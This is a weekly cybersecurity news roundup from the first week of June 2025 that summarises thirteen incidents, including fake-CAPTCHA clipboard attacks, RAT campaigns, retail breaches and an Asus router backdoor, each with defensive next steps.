13 Cybersecurity News Worth Your Attention – 1st Week of June 2025

Each week I spend hours going throguh 20+ different cybersecurity news sources to find and summarise most interesting news from the week so you can quickly catch up on only the most interesting cyber news quickly. 

This weeks keyword is definitely captcha gate, it’s a type of attack that is gaining a lot of momentum and dominating the news.

Also, if you are at all related to information security in the retail space, you need to be alert, the attack wave that originally started in the UK with Co-Op and Marks & Spencier has reached the U.S. and continues strong.

1. Fake Recruiter Emails Target CFOs Using Legit NetBird Tool Globally

CFOs are receiving convincing fake recruitment emails from "Rothschild & Co." offering strategic career opportunities, but clicking the supposed PDF attachment leads to a clever trap: a custom CAPTCHA puzzle that, once solved, secretly downloads and installs the legitimate NetBird remote access tool as a backdoor. The sophisticated campaign targets financial executives globally and has been active for nearly a year.

Key Details

• Targets banks, energy companies, insurers, and investment firms across Europe, Africa, Canada, Middle East, and South Asia
• Part of growing trend of threat actors abusing legitimate remote access tools like ConnectWise, ScreenConnect and Atera to evade detection

Next steps

• Audit legitimate remote access tools: Implement application whitelisting to prevent unauthorized remote access tool installations
• Warn executives in your organisations

Read more: The Hacker News – Fake Recruiter Emails Target CFOs Using Legit NetBird Tool Across 6 Global Regions

2. Microsoft and CrowdStrike Launch Shared Threat Actor Glossary to Cut Attribution Confusion

Security teams are drowning in a sea of threat actor nicknames the same Russian group might be called APT29, Cozy Bear, Midnight Blizzard, or any of a dozen other names depending on which vendor's report you're reading. Microsoft and CrowdStrike have launched a joint cross-reference mapping that works like a "Rosetta Stone," showing which different vendor names refer to the same threat actor without forcing anyone to change their existing naming systems.

Key Details

• The initiative has already mapped over 80 threat actors, confirming matches like Microsoft’s “Volt Typhoon” = CrowdStrike’s “VANGUARD PANDA” and “Secret Blizzard” = “VENOMOUS BEAR”
• Rather than creating a unified naming standard, the project preserves each vendor’s existing taxonomy while providing translation between systems
• Google/Mandiant and Palo Alto Networks are joining the effort, with plans to expand to other cybersecurity vendors
• The mapping is available through Microsoft’s documentation, downloadable files, and programmatic APIs for automated lookups

Next Steps

• See the mapping here: https://learn.microsoft.com/en-us/unified-secops-platform/microsoft-threat-actor-naming

Read more: The Hacker News | SecurityWeek | Microsoft Threat Actor Mapping Resource

3. Fake DocuSign, Gitcode Sites Spread NetSupport RAT using Clipboard poisoning

Users visiting fake DocuSign and Gitcode websites are being tricked into "proving they're not a robot" by completing CAPTCHA challenges that secretly copy malicious PowerShell commands to their clipboard. When victims follow the instructions to paste and run the command (Win+R, Ctrl+V, Enter), they unknowingly trigger a multi-stage infection chain that ultimately installs NetSupport RAT on their systems.

Key Details

• The attack uses “clipboard poisoning” where fake CAPTCHA verification secretly copies obfuscated PowerShell scripts to victims’ clipboards
• Multi-stage infection downloads intermediate scripts from external servers, establishes persistence via GitHub-hosted payloads, and deploys the final NetSupport RAT
• NetSupport Manager is a legitimate remote administration tool frequently abused by threat groups including FIN7, Scarlet Goldfinch, and Storm-0408

Next Steps

• Monitor clipboard activities: Deploy endpoint detection rules specifically targeting clipboard modification events followed by PowerShell execution
• Block legitimate tools used maliciously: Audit and restrict NetSupport Manager installations to authorized use cases only
• Update CAPTCHA awareness: Include fake CAPTCHA clipboard poisoning techniques in security awareness training as this is a newer attack vector

Read more: The Hacker News – Fake DocuSign, Gitcode Sites Spread NetSupport RAT via Multi-Stage PowerShell Attack

4. ClickFix Email Scam Alert: Fake Booking.com Emails Deliver Malware using Clipboard poisoning

Hotel employees are receiving what looks like legitimate Booking.com emails with broken CAPTCHA verifications that need to be "fixed." When victims click to solve the fake CAPTCHA, malicious PowerShell commands are secretly copied to their clipboard, and they're instructed to press Win+R, Ctrl+V, Enter—unknowingly executing malware that installs remote access trojans like XWorm RAT.

Key Details

• Campaign surged dramatically with 47% of total volume occurring in March 2025, specifically targeting food and accommodation sector businesses

Next Steps

• Monitor Windows+R executions: Implement endpoint detection for Run dialog usage immediately following clipboard modifications
• Educate on fake CAPTCHA mechanics: Train users that legitimate CAPTCHAs never require copying/pasting commands or using keyboard shortcuts

Read more: HackRead – ClickFix Email Scam Alert: Fake Booking.com Emails Deliver Malware

5. Compliance Firm Vanta Leaks Customer Data to Other Clients

Companies using Vanta for security compliance suddenly found other organizations' sensitive employee data mixed into their own dashboards due to a product code change gone wrong. The irony is stark: a company trusted to help hundreds of businesses manage their security compliance accidentally exposed customer data to competitors through an internal software bug.

Key Details

• Incident was caused by a recent product code change affecting third-party integrations, not an external attack or credential compromise
• Bug discovered May 26 affected fewer than 4% of customers but still impacted hundreds of organizations across sensitive compliance data
• Exposed data included employee names, account configurations, MFA usage details, and third-party integration settings – all visible to other Vanta customers.
• Vanta committed to complete remediation by June 4 and is updating their integration APIs and access control testing

Next Steps

• Assess SaaS multi-tenancy risks: Review data isolation practices for SaaS vendors and assess the associated risks.

Read more: HackRead – Code Bug at Compliance Firm Vanta Leaks Customer Data to Other Clients

6. Crocodilus Malware Adds Fake Entries To Victims’ Contact Lists In New Scam Campaign

Android users across Europe, South America and Asia are discovering fake bank support numbers mysteriously appearing in their contact lists, courtesy of the Crocodilus banking trojan. When victims call these numbers thinking they're reaching their real bank, they're actually speaking to scammers who can bypass fraud detection systems that typically flag calls from unknown numbers.

Key Details

• Malware spreads via Facebook ads that stay online only 1-2 hours but get 1,000+ views each, primarily targeting users over 35 for maximum financial impact
• Campaign uses region-specific lures: Polish bank/shopping app mimics, Turkish online casino overlays, Spanish browser updates, and Brazilian banking trojans
• Can bypass Android 13+ security restrictions for app installations and overlays real financial apps with fake login screens
• Geographic expansion and technical sophistication suggest involvement of well-resourced, organized threat actors

Next Steps

• Educate on contact verification: Train users to verify bank contact numbers through official websites rather than trusting stored contacts

Read more: The Record – Crocodilus malware adds fake entries to victims’ contact lists in new scam campaign

7. Malaysian home minister’s WhatsApp hacked, used to scam contacts

Malaysia's top security official the home affairs minister, who oversees law enforcement and immigration, discovered his WhatsApp account had been hijacked by attackers who used it to send malicious links to his entire contact list. The embarrassing breach sparked public ridicule and questions about Malaysia's cybersecurity capabilities when even the country's chief security minister couldn't protect his own messaging app.

Key Details

• Attackers used a VPN to compromise Datuk Seri Saifuddin Nasution Ismail’s account and sent malicious links targeting financial and personal information
• Part of escalating pattern: parliamentary speaker targeted in March, former PM’s Telegram/Signal accounts compromised in 2022, police social media hijacked in 2015
• Mobile phishing has become increasingly common in Malaysia with citizens frequently targeted by fraudsters posing as police, bank officials, or court representatives

Next Steps

• Executive protection awareness: Provide specialized cybersecurity training on mobile security and social engineering tactics, specially for executive teams.

Read more: The Record – Malaysian home minister’s WhatsApp hacked, used to scam contacts

8. Security News This Week: A Hacker May Have Deepfaked Trump’s Chief of Staff in a Phishing Campaign

The FBI is investigating a sophisticated attack where someone impersonated Susie Wiles, Trump's chief of staff, using both text messages and AI-generated voice calls that may represent one of the first significant deepfake phishing campaigns. The attackers accessed Wiles' contact list to target high-profile Republican figures and business executives, with some calls attempting financial fraud while others sought political intelligence like pardon lists.

Key Details

• FBI ruled out foreign nation involvement, suggesting this was cybercriminal fraud rather than espionage, despite targeting the president’s closest adviser
• Uncertainty remains over how attackers obtained Wiles’ contacts – could be device compromise or public/gray-market data aggregation

Next Steps

• Implement voice verification protocols: Establish independent authentication methods for high-level communications, especially for sensitive requests

Read more: WIRED – Security News This Week: A Hacker May Have Deepfaked Trump’s Chief of Staff in a Phishing Campaign

9. Retail Cyberattack Wave Escalates with Three Major Breaches This Week

Security teams across the retail sector are reeling from three significant cyberattacks this week alone, as Cartier, Victoria's Secret, and North Face all disclosed breaches affecting thousands of customers. The incidents represent an escalation of the coordinated campaign that began with UK retailers in April and has now spread globally, with attackers targeting everything from luxury jewelers to outdoor gear companies using sophisticated social engineering tactics.

Key Details

• Cartier disclosed that hackers accessed internal systems and stole customer names, email addresses, and countries of residence, though no financial data was compromised
• Victoria’s Secret proactively shut down its entire U.S. website and curtailed in-store functions during Memorial Day weekend, with the incident affecting internal systems including email servers, HR functions, and potentially payroll processes
• North Face revealed that 2,861 customer accounts were compromised in a credential stuffing attack, with attackers using passwords stolen from other breaches to access purchase histories, addresses, and personal information
• These attacks continue the pattern that began with UK retailers Marks & Spencer, Co-op, and Harrods in April, attributed to the DragonForce ransomware group and Scattered Spider collective

Read More
Cartier Data Breach: Luxury Retailer Warns Customers – SecurityWeek
Victoria’s Secret takes website offline after security incident – AP News
Nearly 3,000 North Face website customer accounts breached – The Record

10. Cybercriminals Exploit Salesforce Data Loader in New Social Engineering Campaign

IT teams are being tricked into approving malicious versions of Salesforce's Data Loader tool during sophisticated phone calls, giving attackers extensive access to steal sensitive customer data and move through corporate networks. Google warns that the campaign by "The Com" cybercriminal collective has targeted about 20 organizations across hospitality, retail, and education sectors, with some victims facing extortion demands months after the initial breach.

Key Details

• Fake IT support calls trick employees into installing malicious Salesforce apps that steal customer data
• Campaign linked to “The Com” collective behind MGM and Caesars casino attacks
• Extortion demands often come months after initial breach, suggesting partnership with other threat actors

Next Steps

• Verify caller identity through separate channels before approving any Salesforce app installations
• Audit existing Salesforce connected apps for unauthorized Data Loader versions
• Monitor for unusual large-scale data exports from Salesforce SaaS applications / environments

Read More
Google warns of cybercriminals targeting Salesforce app to steal data – The Record

11. Meta and Yandex Caught Using Secret Tracking Method to Deanonymize Billions of Users

Android users discovered their Facebook and Instagram apps have been secretly identifying them to websites they visit in their browsers - even when not logged into social media in those browsers. When users visit sites with Meta tracking pixels, their installed Facebook app connects through a hidden "localhost socket" to reveal their real identity, allowing Meta to link anonymous web browsing to actual user profiles since 2017 for Yandex and September 2024 for Meta.

Key Details

• JavaScript tracking scripts embedded on thousands of websites silently connect with native apps through localhost sockets to share user data
• Technique bypasses traditional privacy protections by linking browser cookies to Android Advertising IDs and app account identities
• Meta’s tracking script was reportedly disabled early morning after researchers published their findings

Read More
Meta and Yandex abused Internet protocols to covertly track billions of users – Ars Technica

12. Microsoft Launches Free AI-Powered Cybersecurity Program for European Governments

Microsoft launched a new European Security Program that expands its existing Government Security Program which has provided free cybersecurity services to over 40 countries since 2003 to offer enhanced AI-driven threat intelligence specifically for European governments. The program targets escalating attacks from Russia, China, Iran, and North Korea by providing real-time threat insights, early vulnerability warnings, and strengthened partnerships with Europol and other European security organizations to all 27 EU countries plus the UK, EFTA members, and several other European nations.

Key Details

• The existing Government Security Program serves national security agencies and cyber emergency response teams from over 40 countries with more than 100 participating agencies
• Governments access the program through local Microsoft representatives after meeting eligibility criteria focused on intellectual property protections and national security responsibilities
• New European enhancements include embedded Microsoft investigators at Europol headquarters and joint research programs with UK’s Laboratory for AI Security Research

Read More
Microsoft unveils free EU cybersecurity program for governments – BleepingComputer

13. 9,000 Asus Routers Compromised by Persistent SSH Backdoor That Survives Firmware Updates

Asus router owners discovered their devices were secretly compromised by the "AyySSHush" botnet through a sophisticated attack that installs an SSH backdoor written to non-volatile memory, making it impossible to remove even with firmware updates. The malware-free attack exploits authentication bypasses and a known command injection vulnerability to enable remote administrative control through a hidden SSH connection on port 53282.

Key Details

• Attackers disable system logging and AiProtection security features to evade detection while maintaining persistent access
• GreyNoise’s AI tool “Sift” detected the campaign using only 30 malicious requests over three months, demonstrating the attack’s stealth
• Asus released firmware patches to prevent new infections, but existing backdoors remain unremovable through standard updates

Next Steps

• Check for unauthorized SSH access on TCP port 53282 and review authorized_keys files for unfamiliar entries
• Perform factory resets on suspected compromised routers and reconfigure from scratch rather than relying on firmware updates
• Block known malicious IP addresses associated with the campaign and monitor for unusual outbound connections

Read More
9,000 Asus routers compromised by persistent SSH backdoor – Tom’s Hardware